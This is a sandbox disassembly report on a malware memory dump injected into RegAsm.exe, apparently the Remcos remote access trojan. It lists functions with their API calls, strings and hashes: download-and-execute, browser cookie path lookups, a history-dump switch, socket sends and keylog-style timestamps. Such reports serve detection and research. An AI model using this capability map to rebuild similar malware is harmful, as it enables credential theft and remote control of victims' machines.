Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB

Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9

Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

_free.LIBCMT ref: 00444E06
_free.LIBCMT ref: 00444E1D
_free.LIBCMT ref: 00444E3C
_free.LIBCMT ref: 00444E57
_free.LIBCMT ref: 00444E6E

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88

Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 004493BD

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58

Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
CloseHandle.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
Opcode Fuzzy Hash: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A

Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443E6B
_free.LIBCMT ref: 00443E8B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84

Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
__alloca_probe_16.LIBCMT ref: 004511B1
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
__freea.LIBCMT ref: 0045121D

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94

Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
_free.LIBCMT ref: 0044F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9

Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
_free.LIBCMT ref: 004482D3
_free.LIBCMT ref: 004482FA
SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D4

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 004509E6
_free.LIBCMT ref: 004509F8
_free.LIBCMT ref: 00450A0A
_free.LIBCMT ref: 00450A1C

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C

Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444066

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00444078
_free.LIBCMT ref: 0044408B
_free.LIBCMT ref: 0044409C
_free.LIBCMT ref: 004440AD

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF

Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0

Strings

open, xrefs: 00406FB6
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407007, 0040712F

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
API String ID: 2825088817-3056885514
Opcode ID: 3e962aae1bf6d9a082c2cb8e7c72c1813a0f1391a4c7d5151776bd2fdf264440
Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
Opcode Fuzzy Hash: 3e962aae1bf6d9a082c2cb8e7c72c1813a0f1391a4c7d5151776bd2fdf264440
Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B

Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E738
_free.LIBCMT ref: 0044E855

Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44

Strings

., xrefs: 0044EA0C
*?, xrefs: 0044E72C

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54

Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

NG, xrefs: 00409F33
XQG, xrefs: 00409F48
PG, xrefs: 00409EFE

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsend
String ID: XQG$NG$PG
API String ID: 1634807452-3565412412
Opcode ID: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
Opcode Fuzzy Hash: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649

Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3

Strings

`#D, xrefs: 004424ED
`#D, xrefs: 00442400

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: `#D$`#D
API String ID: 885266447-2450397995
Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

0NG, xrefs: 00404097
/sort "Visit Time" /stext ", xrefs: 004040B2

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99

Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 0041CAD7

Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1

Strings

WallpaperStyle, xrefs: 0041CA22, 0041CA55, 0041CAA5
TileWallpaper, xrefs: 0041CAC1
Control Panel\Desktop, xrefs: 0041CA1D, 0041CA50, 0041CAA0

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF

Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004162F5

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

okmode, xrefs: 0041630F
!D@, xrefs: 00417089
PG, xrefs: 00416322

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode$PG
API String ID: 3411444782-3370592832
Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D

Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6

PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
PathFileExistsW.SHLWAPI(00000000), ref: 0040C688

Strings

User Data\Default\Network\Cookies, xrefs: 0040C603
User Data\Profile ?\Network\Cookies, xrefs: 0040C635

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698

Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559

PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
PathFileExistsW.SHLWAPI(00000000), ref: 0040C757

Strings

User Data\Default\Network\Cookies, xrefs: 0040C6D2
User Data\Profile ?\Network\Cookies, xrefs: 0040C704

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698

Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662

Strings

], xrefs: 0040B180
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B17B

Memory Dump Source

Source File: 0000000B.00000002.1043037682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 1497725170-1359877963
Opcode ID: 9c09dbf559b6626df1db828ec84372d5f10ce92b94fa13a2cdc470bbbf48d4b1
Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
Opcode Fuzzy Hash: 9c09dbf559b6626df1db828ec84372d5f10ce92b94fa13a2cdc470bbbf48d4b1
Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC

Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

